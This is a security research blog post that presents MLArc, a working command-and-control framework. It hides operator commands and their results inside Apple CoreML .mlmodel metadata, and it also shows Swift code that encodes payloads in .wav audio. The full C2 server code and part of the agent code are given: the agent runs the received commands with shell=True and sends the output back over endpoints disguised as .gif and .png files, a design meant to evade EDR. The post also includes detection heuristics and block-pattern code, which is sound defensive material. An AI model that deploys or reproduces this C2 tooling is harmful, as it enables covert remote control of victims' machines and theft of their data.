In Part 1 of this series, we focused on CoreML and Vision, showing how .mlmodel files could be weaponized to carry encrypted payloads inside weight arrays, and how Vision OCR could be abused as a covert key oracle to unlock them. The key insight was that Apple’s AI stack, designed to be fast and private, treats models and images as “just data,” leaving them unmonitored and trusted by the system.

In this post, we extend that attack surface further into AVFoundation, Apple’s low-level multimedia framework. AVFoundation powers nearly every audio and video operation on macOS and iOS: FaceTime, Siri, Voice Memos, Podcasts, Music, GarageBand, Zoom, and countless third-party apps. It is omnipresent and implicitly trusted. More importantly for our purposes, AVFoundation exposes raw PCM buffers of audio samples, where each sample is simply a float value representing amplitude.

There is no semantic validation of those values. Apple assumes they are “just sound.” That assumption creates an opening for attackers: we can encode structured payload data into waveforms, store it in an audio file like .wav, and later decode it with the same framework. To the user, it’s a normal sound file; to AVFoundation, it’s just another buffer; to us, it’s a covert payload channel.

Encoding Payloads in Audio with AVFoundation



The technique works by converting an arbitrary payload string into binary, then mapping those bits to sine wave amplitudes at a fixed carrier frequency (15 kHz in the code below):

- "1" is represented as a sine wave at amplitude 1.0.
- "0" is represented as a sine wave at amplitude 0.2.
- Each bit lasts 0.1 seconds.

This yields a steady, high-pitched tone that steps between two volume levels. It is easy to dismiss as noise, yet it encodes our entire payload.

Here’s the Swift encoder:

```swift
import AVFoundation

func embedPayloadInAudio(payload: String, outputAudio: URL) {
    // Convert payload to binary string
    let binaryPayload = payload.utf8.map { String($0, radix: 2).leftPadded(to: 8) }.joined()
    print("Binary Payload to Embed: \(binaryPayload)")

    let sampleRate = 44100.0
    let toneDuration = 0.1 // each bit lasts 0.1s
    let baseFrequency = 15000.0
    let amplitudes = ["0": 0.2, "1": 1.0]

    var audioData = [Float]()
    for bit in binaryPayload {
        let amplitude = amplitudes[String(bit)]!
        let samples = Int(sampleRate * toneDuration)
        for i in 0..<samples {
            let sample = Float(amplitude * sin(2.0 * .pi * baseFrequency * Double(i) / sampleRate))
            audioData.append(sample)
        }
    }

    let format = AVAudioFormat(standardFormatWithSampleRate: sampleRate, channels: 1)!
    let audioBuffer = AVAudioPCMBuffer(pcmFormat: format, frameCapacity: AVAudioFrameCount(audioData.count))!
    audioBuffer.frameLength = AVAudioFrameCount(audioData.count)
    audioData.withUnsafeBufferPointer { ptr in
        audioBuffer.floatChannelData?.pointee.update(from: ptr.baseAddress!, count: audioData.count)
    }

    do {
        let audioFile = try AVAudioFile(forWriting: outputAudio, settings: format.settings)
        try audioFile.write(from: audioBuffer)
        print("Payload embedded in audio file: \(outputAudio.path)")
    } catch {
        print("Failed to write audio file: \(error)")
    }
}

// Helper to pad binary strings
extension String {
    func leftPadded(to length: Int, with character: Character = "0") -> String {
        return String(repeating: character, count: max(0, length - self.count)) + self
    }
}

// Example usage
let payload = "Hello, World!"
let outputAudioURL = URL(fileURLWithPath: "payload_audio.wav")
embedPayloadInAudio(payload: payload, outputAudio: outputAudioURL)
```

If you run this script, the output is a valid .wav file that plays fine in iTunes, QuickTime, or any media player. But hidden inside the waveform is your payload string, encoded bit by bit.
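To put the channel's cost in numbers, here is a small Python calculation using the encoder's parameters (44.1 kHz sample rate, 0.1 s per bit, 8 bits per byte). It assumes the file is stored as 32-bit float mono PCM, which is what the standard AVAudioFormat used above describes; the helper name `encoding_cost` is hypothetical.

```python
# Back-of-the-envelope cost of the amplitude encoding, using the Swift encoder's parameters.
SAMPLE_RATE = 44_100
BIT_DURATION_S = 0.1
BITS_PER_BYTE = 8
BYTES_PER_SAMPLE = 4  # assumption: 32-bit float mono PCM


def encoding_cost(payload: str) -> dict:
    """Return bit count, audio duration, sample count and approximate PCM size."""
    n_bits = len(payload.encode("utf-8")) * BITS_PER_BYTE
    samples_per_bit = round(SAMPLE_RATE * BIT_DURATION_S)  # 4410, as in the Swift code
    n_samples = n_bits * samples_per_bit
    return {
        "bits": n_bits,
        "seconds": n_bits * BIT_DURATION_S,
        "samples": n_samples,
        "pcm_bytes": n_samples * BYTES_PER_SAMPLE,  # excludes the WAV header
    }


cost = encoding_cost("Hello, World!")
print(cost)
```

For "Hello, World!" (13 bytes) this works out to 104 bits, 10.4 seconds of audio, 458,640 samples and roughly 1.8 MB of PCM data, a throughput of 10 bits per second. The channel is slow, and the files are large relative to the payload they carry.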



Decoding Payloads from Audio

Decoding is the reverse process:

- Read the audio file into a PCM buffer.
- Break the buffer into chunks of 0.1 s each (the samples per tone).
- Measure the average absolute amplitude of each chunk.
- If the amplitude exceeds a threshold, the bit is 1; otherwise it is 0.
- Recombine the bits into bytes and reconstruct the original string.

Here’s the Swift decoder:

```swift
import AVFoundation

func decodePayloadFromAudio(audioFile: URL) {
    do {
        let inputFile = try AVAudioFile(forReading: audioFile)
        let audioBuffer = AVAudioPCMBuffer(pcmFormat: inputFile.processingFormat,
                                           frameCapacity: AVAudioFrameCount(inputFile.length))!
        try inputFile.read(into: audioBuffer)
        print("Audio file read successfully.")

        let sampleRate: Float = 44100.0
        let duration: Float = 0.1
        let samplesPerTone = Int(sampleRate * duration)
        let amplitudeThreshold: Float = 0.5

        var binaryPayload = ""
        if let channelData = audioBuffer.floatChannelData?.pointee {
            let totalSamples = Int(audioBuffer.frameLength)
            for i in stride(from: 0, to: totalSamples, by: samplesPerTone) {
                let chunk = Array(UnsafeBufferPointer(start: channelData + i,
                                                      count: min(samplesPerTone, totalSamples - i)))
                let amplitude = chunk.map { abs($0) }.reduce(0, +) / Float(chunk.count)
                binaryPayload.append(amplitude > amplitudeThreshold ? "1" : "0")
            }
        }

        // Convert binary back to text
        var payloadBytes = [UInt8]()
        var index = binaryPayload.startIndex
        while index < binaryPayload.endIndex {
            let nextIndex = binaryPayload.index(index, offsetBy: 8, limitedBy: binaryPayload.endIndex) ?? binaryPayload.endIndex
            let byteString = String(binaryPayload[index..<nextIndex])
            if let byte = UInt8(byteString, radix: 2) {
                payloadBytes.append(byte)
            }
            index = nextIndex
        }

        let payload = String(bytes: payloadBytes, encoding: .utf8) ?? "Decoding failed"
        print("Decoded Payload: \(payload)")
    } catch {
        print("Failed to read audio file: \(error)")
    }
}

let inputAudioURL = URL(fileURLWithPath: "payload_audio.wav")
decodePayloadFromAudio(audioFile: inputAudioURL)
```

Run the decoder, and the original string (Hello, World!) is reconstructed from the waveform.
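Why does a threshold of 0.5 separate the bits? The mean absolute value of a sine of amplitude A is about 2A/π, so a "1" chunk averages roughly 0.64 and a "0" chunk roughly 0.13, leaving 0.5 comfortably between them. The Python sketch below mirrors the Swift encoder and decoder in memory (no WAV file, no AVFoundation) to check that reasoning; the function names are hypothetical and the parameters are copied from the Swift code.

```python
import math

# Parameters copied from the Swift encoder/decoder above.
SAMPLE_RATE = 44_100
BIT_DURATION_S = 0.1
CARRIER_HZ = 15_000.0
AMPLITUDES = {"0": 0.2, "1": 1.0}
THRESHOLD = 0.5
SAMPLES_PER_BIT = round(SAMPLE_RATE * BIT_DURATION_S)  # 4410


def tone(amplitude):
    """One bit's worth of samples: a 15 kHz sine at the given amplitude."""
    return [amplitude * math.sin(2 * math.pi * CARRIER_HZ * i / SAMPLE_RATE)
            for i in range(SAMPLES_PER_BIT)]


def mean_abs(chunk):
    """Average absolute sample value, the statistic the Swift decoder thresholds."""
    return sum(abs(s) for s in chunk) / len(chunk)


def encode(payload):
    bits = "".join(f"{byte:08b}" for byte in payload.encode("utf-8"))
    samples = []
    for bit in bits:
        samples.extend(tone(AMPLITUDES[bit]))
    return samples


def decode(samples):
    bits = "".join(
        "1" if mean_abs(samples[i:i + SAMPLES_PER_BIT]) > THRESHOLD else "0"
        for i in range(0, len(samples), SAMPLES_PER_BIT)
    )
    # Group into bytes, ignoring any trailing partial byte.
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))
    return data.decode("utf-8")


level_one = mean_abs(tone(AMPLITUDES["1"]))   # close to 2 * 1.0 / pi
level_zero = mean_abs(tone(AMPLITUDES["0"]))  # close to 2 * 0.2 / pi
print(f"'1' level = {level_one:.3f}, '0' level = {level_zero:.3f}")
print(decode(encode("Hello, World!")))
```

The round trip only works when chunks line up with bit boundaries; the Swift decoder makes the same assumption by reading from sample 0 in fixed 4,410-sample steps.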

Why AVFoundation Works as a Covert Channel

This technique is stealthy because:

- Audio is treated as passive data. Defenders rarely analyze PCM amplitudes.

- No metadata exposure. Unlike steganography in ID3 tags or filenames, the payload is hidden purely in the waveform.

- Trusted API. AVFoundation is Apple-signed and used everywhere. Using it raises no alerts.

- Cross-channel synergy. A model (.mlmodel) can stage the agent, Vision (.png) can provide the key, and AVFoundation (.wav) can deliver tasking.

Individually, each channel looks harmless. Together, they form a complete covert C2 path.

MLArc: A Standalone C2 Powered Entirely by CoreML

MLArc is a standalone C2 system that communicates exclusively through Apple’s AI artifacts. Every tasking command and every response is encoded inside .mlmodel files, while check-ins are ordinary HTTP GET requests to innocuous-looking .gif endpoints. To the operating system and to Apple’s CoreML runtime, these are just data models. To MLArc, they are an entire covert C2 channel.

To our knowledge, MLArc is the first framework that treats Apple’s AI stack itself as the medium of communication.

A Note on Scope and Execution

It’s important to emphasize that MLArc is a proof of concept, but it is also fully functional and tested end-to-end in Python. The goal here is not to showcase yet another method of running system commands; as red teamers know, there are countless ways to execute a process once you already have a foothold.

The novelty lies in the transport layer and the on-disk representation of C2 traffic. By embedding commands and results inside .mlmodel files, MLArc creates a channel that:

- Evades traditional network signatures (commands never appear as readable JSON fields, and POST bodies carry model files rather than obvious payloads).

- Evades on-disk inspection (files appear as legitimate CoreML models).

- Operates within Apple’s trusted model tooling for parsing (coremltools and CoreML.framework), with no custom parser.

The fact that we wrote this in Python with coremltools is incidental; the core concept is language-agnostic. A red teamer could rewrite the agent in Objective-C, Swift, or even Go, as long as it uses Apple’s CoreML APIs to load and parse .mlmodel files. The server could be adapted to any backend stack that can generate protobufs.

Think of MLArc as a blueprint for a new class of C2 frameworks: not about how you execute the payload, but about how you hide communication and persistence inside AI artifacts.

MLArc Architecture

At its core, MLArc is a C2 framework that communicates entirely through CoreML models (.mlmodel). Instead of exchanging JSON blobs or custom binary protocols, MLArc turns Apple’s machine learning model format into the carrier for all C2 traffic. This design is stealthy by nature because .mlmodel files are treated as trusted “data” by macOS and iOS, parsed by Apple’s own CoreML runtime, and rarely, if ever, inspected by EDR or AV solutions.

How It Works

- Tasking Commands Embedded in Models

  - When the operator enters a command in the MLArc console, the C2 server doesn’t wrap it in JSON or write it to disk as a script.
  - Instead, it generates a valid .mlmodel file using coremltools.
  - The model is a trivial neural network (a “noop regressor”), harmless on its face, but the operator’s command is inserted into its metadata.userDefined dictionary under the key "cmd".
  - The server then serves this .mlmodel file to the agent when it checks in.

  Example of command embedding:

```text
model {
  description {
    metadata {
      userDefined {
        key: "cmd"
        value: "whoami"
      }
    }
  }
}
```

- To any forensic tool, this is just a model with developer metadata. To MLArc, it is a live C2 instruction.

- Agent Fetches and Parses Models
  - The agent periodically checks in to the server using a normal HTTP GET request.
  - If a command is queued, the server responds with the .mlmodel file, hex-encoded inside a small JSON object ({"payload": ...}).
  - The agent saves it temporarily, loads it with ct.models.MLModel(), and triggers a dummy prediction (model.predict()) to force CoreML to parse the protobuf.
  - Once parsed, the agent reads the "cmd" value out of the model metadata.
  - Importantly, the agent does not need to implement a custom parser: it relies on coremltools and Apple’s CoreML.framework to do the heavy lifting.
- Execution of Commands
  - After extracting the command, the agent executes it locally.
  - The execution mechanism is flexible: in our PoC we used Python’s subprocess.run(), but this could just as easily be replaced with Objective-C APIs, Swift, or any other system call mechanism.
  - The point is not how execution happens, but how the tasking was delivered invisibly via an .mlmodel.
- Results Exfiltrated in Models
  - Once a command executes, the agent encapsulates the result in a new .mlmodel file.
  - Just as commands are stored in metadata.userDefined["cmd"], results are stored in metadata.userDefined["result"].
  - The agent uploads this model to the server via a POST request.
  - The server loads the model with coremltools, extracts the result string, and displays it in the operator console.

  Example of result embedding:

```text
model {
  description {
    metadata {
      userDefined {
        key: "result"
        value: "hari"
      }
    }
  }
}
```

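- Operator Console
  - The server provides a simple operator interface.
  - Console commands such as sessions and connect <id> manage sessions; once connected, commands such as whoami or ls are queued for the agent.
  - Behind the scenes, every tasking and every response is wrapped inside .mlmodel artifacts instead of being sent as standalone plaintext commands or results. The strings themselves are not encrypted, however: protobuf stores them as raw UTF-8 inside the model.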

Key Properties

- Stealth Transport Layer: Tasking and results travel only inside .mlmodel files. No scripts or binaries transit the network, and the only JSON is a thin envelope around the hex-encoded model.
- On-Disk Stealth: Payloads are hidden inside model metadata and appear indistinguishable from developer annotations.

- Apple-Signed Parser: Every model is parsed by Apple’s trusted CoreML runtime. EDR sees this as normal application behavior.

- Flexible Execution: The execution mechanism is irrelevant as the novelty lies in how commands and results move, not how they run.

- Proof of Concept, but Fully Functional: Written and tested in Python using coremltools, but the concept is portable to Objective-C, Swift, or any language that can handle CoreML APIs.

With this architecture, MLArc reframes how we think about C2. It shows that AI artifacts are not passive files: they can be active containers for attacker communications, hidden in plain sight and running through Apple’s trusted frameworks.

MLArc in Action

To illustrate how MLArc operates, let’s walk through a simple session where the operator issues a whoami command, the agent executes it, and the result is returned, all through .mlmodel files.

1. Operator Issues a Command

From the MLArc console, the operator connects to a session and queues the task:

```text
C2> sessions
 - 3fa85f64-5717-4562-b3fc-2c963f66afa6
C2> connect 3fa85f64-5717-4562-b3fc-2c963f66afa6
[+] Connected to CoreML session 3fa85f64-5717-4562-b3fc-2c963f66afa6
3fa85f64> whoami
[+] Command 'whoami' queued for 3fa85f64-5717-4562-b3fc-2c963f66afa6
```

The server now generates a .mlmodel containing the command.

2. Command Embedded into a Model

The server uses coremltools to build a trivial network and stores the operator’s command in its metadata:

```text
model {
  description {
    metadata {
      userDefined {
        key: "cmd"
        value: "whoami"
      }
    }
  }
}
```

This file is structurally valid, compiles with coremlc, and can be loaded by Apple’s CoreML.framework without issue. Nothing in the file looks abnormal to a forensic tool that does not parse Model.proto in depth.

3. Agent Fetches and Parses the Model

The agent checks in with the server and receives the model as a hex-encoded payload. It writes the file to disk temporarily, then loads it with CoreML:

```python
import coremltools as ct

model = ct.models.MLModel("task_3fa85f64.mlmodel")
_ = model.predict({"input": [0.0]})  # forces CoreML to parse
command = model.get_spec().description.metadata.userDefined.get("cmd")
print(f"[+] Extracted command: {command}")
```

Output:

```text
[+] Extracted command: whoami
```

At this point, the agent executes the command locally (using subprocess in our PoC).

4. Command Execution

```python
import subprocess

result = subprocess.run("whoami", shell=True, capture_output=True, text=True)
print(result.stdout.strip())
```

5. Result Encoded into a Return Model

Instead of sending the plaintext back, the agent builds another .mlmodel with the result in metadata:

```text
model {
  description {
    metadata {
      userDefined {
        key: "result"
        value: "hari"
      }
    }
  }
}
```

This file is uploaded back to the server with a POST request to the /_image.png endpoint.

6. Server Parses and Displays Result

The server loads the returned model and extracts the value:

```text
[+] Received CoreML result for session 3fa85f64-5717-4562-b3fc-2c963f66afa6: hari
```

To the operator, this looks like any other C2 response. To the system and EDR, it looks like the handling of a benign CoreML model.

End-to-End Summary

- Operator enters whoami.
- Server generates a .mlmodel with metadata.userDefined["cmd"] = "whoami".
- Agent fetches and parses the model with CoreML.
- Agent executes whoami and captures the result.
- Agent builds another .mlmodel with metadata.userDefined["result"] = "hari".
- Server parses the model and displays the result.

Throughout this entire exchange, no plaintext commands, scripts, or binaries cross the wire: the only JSON is a thin envelope around the hex-encoded model, and everything else travels as .mlmodel files that appear to be legitimate AI models.

To our knowledge, this is the first proof-of-concept (but fully functional) C2 that demonstrates CoreML models as a transport channel. The execution method (subprocess.run()) is just one example; the real innovation lies in the transport and on-disk stealth.

Detection and Defensive Strategies

MLArc demonstrates how Apple’s AI artifacts can serve as covert carriers for command-and-control traffic. By design, it exploits the assumption that AI models, images, and audio are passive data. For defenders, the challenge is that CoreML, Vision, and AVFoundation are trusted, Apple-signed frameworks, and most security tooling has little or no visibility into what happens inside them.

But while MLArc exploits these blind spots, defenders still have several options.

1. Monitoring .mlmodel Usage

- File Activity: Log when .mlmodel files are created, written, or deleted outside of expected directories (e.g., Xcode projects or ML apps).
- Process Context: Track which processes are loading models. A Python process that polls a server every 2 seconds and intermittently loads CoreML models from temporary files is suspicious.
- Telemetry Hooks: DTrace (where System Integrity Protection permits it) can trace calls into CoreML APIs such as MLModel(contentsOf:), and Endpoint Security file events can show which processes create or open .mlmodel files.
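In MLArc the agent sleeps a fixed 2 seconds between check-ins, so its HTTP polls (and the model loads that follow queued tasks) recur at a near-constant interval. The sketch below flags that regularity from a list of per-process event timestamps. It assumes you already collect those timestamps from some telemetry source (for example Endpoint Security file events or proxy logs); the function name and all thresholds are hypothetical, illustrative values.

```python
import statistics


def looks_like_beacon(timestamps, max_interval_s=10.0, max_jitter_ratio=0.1, min_events=5):
    """Heuristic: flag events that recur at a short, near-constant interval.

    timestamps: event times in seconds for one process (HTTP polls or model loads).
    All thresholds are illustrative assumptions, not tuned values.
    """
    if len(timestamps) < min_events:
        return False  # too few events to judge regularity
    ts = sorted(timestamps)
    intervals = [later - earlier for earlier, later in zip(ts, ts[1:])]
    median = statistics.median(intervals)
    if median <= 0 or median > max_interval_s:
        return False  # simultaneous bursts, or polling too slow to matter here
    # Spread of the intervals relative to the median: low means clock-like regularity.
    jitter = statistics.pstdev(intervals) / median
    return jitter <= max_jitter_ratio


# Usage: a 2-second poller versus sporadic, user-driven model loads.
print(looks_like_beacon([0.0, 2.0, 4.1, 6.0, 8.05, 10.0]))            # -> True
print(looks_like_beacon([0.0, 30.0, 400.0, 410.0, 2000.0, 2100.0]))   # -> False
```

An agent that randomizes its sleep would blunt this check; MLArc's fixed `time.sleep(2)` does not.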

2. Inspecting Model Metadata

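- metadata.userDefined Keys: Legitimate models rarely use arbitrary userDefined keys beyond training or tooling metadata (descriptive fields such as author and license have dedicated metadata fields of their own). Unknown keys like "cmd" or "result" are red flags.
- Entropy and Content Analysis: Commands and results tend to look like shell syntax or command output, not typical model annotations; an encrypted or encoded payload would instead stand out as a long, high-entropy string.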

- Diffing Against Known Good: Compare models against expected versions. Sudden appearance of extra fields or float arrays may indicate tampering.
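The checks above can be combined into a small heuristic pass over a model's userDefined metadata. This sketch takes the map as a plain dict; with coremltools you could obtain it from `ct.models.utils.load_spec(path).description.metadata.userDefined`, a protobuf map that supports dict-style iteration. The allowlisted prefix reflects keys that coremltools' converters commonly write (such as `com.github.apple.coremltools.version`); treat that prefix list, the shell-hint regex and the entropy cutoff as assumptions to tune, and `audit_user_defined` as a hypothetical name.

```python
import math
import re
from collections import Counter

# Assumption: keys under these prefixes are written by legitimate tooling.
KNOWN_PREFIXES = ("com.github.apple.coremltools.",)
# Rough signal for shell-like values: common binaries as whole words, or shell metacharacters.
SHELL_HINT = re.compile(r"(^|[\s;|&])(sh|bash|zsh|osascript|curl|whoami|ls|cat|python3?)(\s|$)|[|;&`$]")


def shannon_entropy(text):
    """Bits per character of the string's character distribution."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def audit_user_defined(user_defined, extra_allowed=()):
    """Return (key, reason) findings for suspicious userDefined entries."""
    findings = []
    for key, value in user_defined.items():
        if not key.startswith(KNOWN_PREFIXES) and key not in extra_allowed:
            findings.append((key, "unexpected key"))
        if SHELL_HINT.search(value):
            findings.append((key, "value looks like a shell command"))
        if len(value) >= 64 and shannon_entropy(value) > 5.0:
            findings.append((key, "long high-entropy value"))
    return findings


print(audit_user_defined({"cmd": "whoami"}))
print(audit_user_defined({"com.github.apple.coremltools.version": "7.1"}))  # -> []
```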

3. Behavioral Correlation

- Execution Artifacts: Even if the transport layer is hidden, the payload still has to execute. Monitor for suspicious subprocess calls (e.g., osascript, sh, or binaries spawned from Python).
- Repeated Fetch Cycles: Agents polling the server every few seconds for .mlmodel updates look different from legitimate apps that occasionally load models for inference.
- Cross-Channel Artifacts: If Vision OCR or AVFoundation amplitude decoding appears alongside unusual .mlmodel activity, treat it as highly suspicious.
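On the audio side, the two-level scheme described earlier leaves a recognizable fingerprint: its amplitude envelope jumps between exactly two values. The sketch below checks for that in a list of mono float samples (however you decode them). It assumes the window equals one bit (4,410 samples, i.e. 0.1 s at 44.1 kHz); a real scanner would have to sweep window sizes and offsets, and would miss schemes that do not key amplitude. Function names and thresholds are hypothetical.

```python
import math


def envelope(samples, window):
    """Mean absolute value of each full, consecutive window (a crude amplitude envelope)."""
    return [sum(abs(s) for s in samples[i:i + window]) / window
            for i in range(0, len(samples) - window + 1, window)]


def looks_amplitude_keyed(samples, window=4410, tolerance=0.05, min_windows=16):
    """Heuristic: True if every window's level sits near one of two distinct values."""
    env = envelope(samples, window)
    if len(env) < min_windows:
        return False
    lo, hi = min(env), max(env)
    if hi - lo <= 2 * tolerance:
        return False  # effectively one level: nothing is being keyed
    near_two_levels = sum(abs(e - lo) <= tolerance or abs(e - hi) <= tolerance for e in env)
    return near_two_levels == len(env)


def make_tone(amplitude, n_samples, carrier_hz=15_000.0, rate=44_100):
    """Test-signal helper: a sine at a fixed amplitude."""
    return [amplitude * math.sin(2 * math.pi * carrier_hz * i / rate) for i in range(n_samples)]


bits = "0100100001101001"  # "Hi" in ASCII
keyed = [s for b in bits for s in make_tone(1.0 if b == "1" else 0.2, 4410)]
ramp = [s for k in range(20) for s in make_tone(k / 19, 4410)]  # smoothly rising volume
print(looks_amplitude_keyed(keyed), looks_amplitude_keyed(ramp))  # -> True False
```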

4. Network Telemetry

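- Model Transfer Patterns: Frequent downloads of .mlmodel files from non-Apple endpoints should raise alerts. Note that MLArc never names a file .mlmodel on the wire: tasking arrives as hex inside JSON from a .gif URL, and results are uploaded to a .png URL.
- Content Inspection: Because .mlmodel files are protobufs with a published schema (Model.proto), defenders can build decoders to scan metadata fields, after unwrapping any transport encoding such as MLArc's hex-in-JSON envelope.
- Size & Frequency: Tiny models (<10 KB) being transferred regularly are unusual; most real models are megabytes in size.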
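Because protobuf stores string fields as raw UTF-8, a metadata entry such as cmd = whoami appears verbatim inside the model bytes. The sketch below hand-encodes one map<string, string> entry following the protobuf wire format (key as field 1, value as field 2, both length-delimited) and searches for it after unwrapping MLArc's JSON check-in envelope. It is deliberately not a full Model.proto decoder, and the "model" in the usage example is synthetic bytes, not a valid .mlmodel; the helper names are hypothetical.

```python
import json


def encode_varint(n):
    """Protobuf base-128 varint encoding of a non-negative integer."""
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        if n:
            out.append(byte | 0x80)  # more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def map_entry(key, value):
    """Wire bytes of one map<string, string> entry.

    0x0A and 0x12 are the tags for fields 1 and 2 with wire type 2 (length-delimited).
    """
    k, v = key.encode("utf-8"), value.encode("utf-8")
    return b"\x0a" + encode_varint(len(k)) + k + b"\x12" + encode_varint(len(v)) + v


def unwrap_mlarc_envelope(body):
    """MLArc check-in responses are JSON: {"payload": "<hex of the .mlmodel>"} or null."""
    payload = json.loads(body).get("payload")
    return bytes.fromhex(payload) if payload else b""


def contains_entry(model_bytes, key, value):
    return map_entry(key, value) in model_bytes


# Usage with synthetic bytes standing in for a real model.
fake_model = b"\x08\x04" + map_entry("cmd", "whoami")
body = json.dumps({"payload": fake_model.hex()})
print(contains_entry(unwrap_mlarc_envelope(body), "cmd", "whoami"))  # -> True
```

In practice a scanner would look for the key half alone (for example `b"\x0a\x03cmd\x12"`) or decode the model properly. Result uploads need no unwrapping at all: they are posted as raw protobuf, so result strings are visible in the request body whenever the traffic itself is readable.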

5. Mitigation Strategies

- Application Whitelisting: Limit which apps are allowed to load .mlmodel files through CoreML.
- Model Signing/Verification: Enterprises could adopt internal signing for production models, rejecting unsigned or altered .mlmodel files.
- EDR Enrichment: Vendors need to extend inspection capabilities to AI artifacts. This means parsing protobuf-based .mlmodel files and applying content heuristics.
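A lightweight stand-in for full model signing is a pinned-hash allowlist: record the SHA-256 of every approved model and refuse anything else. This is a simpler technique than real code signing (it proves integrity against a list you control, not provenance), and it covers single-file .mlmodel files rather than directory-based .mlpackage bundles. The function names and sample data are hypothetical.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path, chunk_size=1 << 20):
    """Stream a file through SHA-256 so large models need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def is_approved(digest, approved_digests):
    """True if digest matches a pinned digest (constant-time comparison)."""
    return any(hmac.compare_digest(digest, d) for d in approved_digests)


# Usage with in-memory bytes standing in for model files.
approved = {sha256_hex(b"production model v1")}
print(is_approved(sha256_hex(b"production model v1"), approved))        # -> True
print(is_approved(sha256_hex(b"production model v1 + cmd"), approved))  # -> False
```

Any change to a model, including a single added metadata entry, changes its digest, which is exactly the tampering MLArc-style tasking relies on.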

Closing Thoughts

MLArc is a proof of concept, but also a fully functional demonstration of how Apple’s AI stack can be repurposed as a stealthy C2 channel.

By chaining CoreML, Vision, and AVFoundation, we showed that models, images, and audio can no longer be treated as passive data. They are active containers that adversaries can weaponize.

For red teams, this is a powerful new vector. For blue teams, it’s a wake-up call: to catch threats like MLArc, defenders must treat AI artifacts as first-class citizens in security telemetry.

MLArc C2 Server and Agent Code

We are sharing the MLArc C2 proof of concept, a fully functional framework that uses CoreML .mlmodel files as the transport layer for tasking and results, to demonstrate how Apple’s AI stack can be weaponized for stealthy C2. This code is released strictly for research and educational purposes to highlight new attack surfaces; do not use it for unauthorized activity.

C2 Server

```python
import uvicorn
from fastapi import FastAPI, Query, File, UploadFile, HTTPException
from typing import Dict, Optional
import os
import threading
import coremltools as ct
from coremltools.models import datatypes, neural_network

app = FastAPI()
sessions: Dict[str, Optional[str]] = {}
lock = threading.Lock()
DEBUG = True


def create_command_model(command: str, model_path: str) -> None:
    try:
        if not command.strip():
            raise HTTPException(status_code=400, detail="Command cannot be empty")
        input_features = [("input", datatypes.Array(1))]
        output_features = [("output", datatypes.Array(1))]
        builder = neural_network.NeuralNetworkBuilder(
            input_features,
            output_features,
            mode="regressor"
        )
        builder.add_activation(
            name="noop",
            non_linearity="LINEAR",
            input_name="input",
            output_name="output"
        )
        builder.spec.description.predictedFeatureName = "output"
        builder.spec.description.metadata.userDefined["cmd"] = command.strip()
        ct.models.utils.save_spec(builder.spec, model_path)
    except Exception as e:
        print(f"[-] Error creating model: {e}")
        raise HTTPException(status_code=500, detail=f"Model generation failed: {e}")


@app.get("/_init.gif")
async def initialize_session(session_id: str = Query(...)):
    with lock:
        if session_id not in sessions:
            sessions[session_id] = None
            if DEBUG:
                print(f"[+] Initialized CoreML session {session_id}")
    return {"status": "initialized"}


@app.get("/_tracking.gif")
async def fetch_command(session_id: str = Query(...)):
    with lock:
        if session_id not in sessions:
            raise HTTPException(status_code=404, detail="Session not found")
        command = sessions.get(session_id)
        if command == "exit":
            del sessions[session_id]
            print(f"[+] CoreML session {session_id} has been terminated.")
            return {"payload": None}
        if not command:
            return {"payload": None}
        model_path = f"task_{session_id}.mlmodel"
        create_command_model(command.strip(), model_path)
        with open(model_path, "rb") as f:
            binary_model = f.read().hex()
        sessions[session_id] = None
        os.remove(model_path)
    return {"payload": binary_model}


@app.post("/_image.png")
async def post_result(session_id: str = Query(...), file: UploadFile = File(...)):
    try:
        result_path = f"result_{session_id}.mlmodel"
        with open(result_path, "wb") as f:
            f.write(await file.read())
        model = ct.models.MLModel(result_path)
        result = model.get_spec().description.metadata.userDefined.get("result", "")
        os.remove(result_path)
        if DEBUG:
            print(f"[+] Received CoreML result for session {session_id}: {result}")
        return {"status": "received", "result": result}
    except Exception as e:
        print(f"[-] Error processing uploaded model: {e}")
        return {"status": "error", "detail": str(e)}


def start_c2_console():
    print("[+] Starting C2 console...")
    while True:
        try:
            command = input("C2> ").strip()
            if command == "sessions":
                with lock:
                    for session_id in sessions:
                        print(f" - {session_id}")
            elif command.startswith("connect "):
                _, session_id = command.split(maxsplit=1)
                if session_id in sessions:
                    interact_with_session(session_id)
                else:
                    print(f"[-] Session {session_id} not found.")
            elif command in ["exit", "quit"]:
                print("[+] Exiting C2 console.")
                break
            else:
                print("[-] Unknown command. Try: sessions, connect <session_id>, exit.")
        except KeyboardInterrupt:
            print("\n[+] Exiting console...")
            break


def interact_with_session(session_id: str):
    print(f"[+] Connected to CoreML session {session_id}")
    while True:
        command = input(f"{session_id}> ").strip()
        if command == "back":
            break
        elif command == "exit":
            with lock:
                sessions[session_id] = "exit"
            break
        else:
            with lock:
                sessions[session_id] = command
            print(f"[+] Command '{command}' queued for {session_id}")


@app.on_event("startup")
async def startup_event():
    threading.Thread(target=start_c2_console, daemon=True).start()


if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8080, log_level="error")
```

Agent

```python
import requests
import time
import coremltools as ct
from coremltools.models import datatypes, neural_network
import uuid
import tempfile
import os
import subprocess

C2_HOST = "127.0.0.1"
C2_PORT = 8080
SESSION_ID = str(uuid.uuid4())


def execute_command_capture_output(command_str: str) -> str:
    try:
        result = subprocess.run(command_str, shell=True, capture_output=True, text=True)
        return result.stdout.strip() or result.stderr.strip()
    except Exception as e:
        return f"[-] Execution error: {e}"


def create_result_model(result: str, model_path: str):
    input_features = [("input", datatypes.Array(1))]
    output_features = [("output", datatypes.Array(1))]
    builder = neural_network.NeuralNetworkBuilder(input_features, output_features, mode="regressor")
    builder.add_activation("noop", "LINEAR", "input", "output")
    builder.spec.description.predictedFeatureName = "output"
    builder.spec.description.metadata.userDefined["result"] = result[:4000]
    ct.models.utils.save_spec(builder.spec, model_path)


def send_output_to_server(result: str):
    try:
        model_path = f"response_{SESSION_ID}.mlmodel"
        create_result_model(result, model_path)
        with open(model_path, "rb") as f:
            requests.post(
                f"http://{C2_HOST}:{C2_PORT}/_image.png",
                params={"session_id": SESSION_ID},
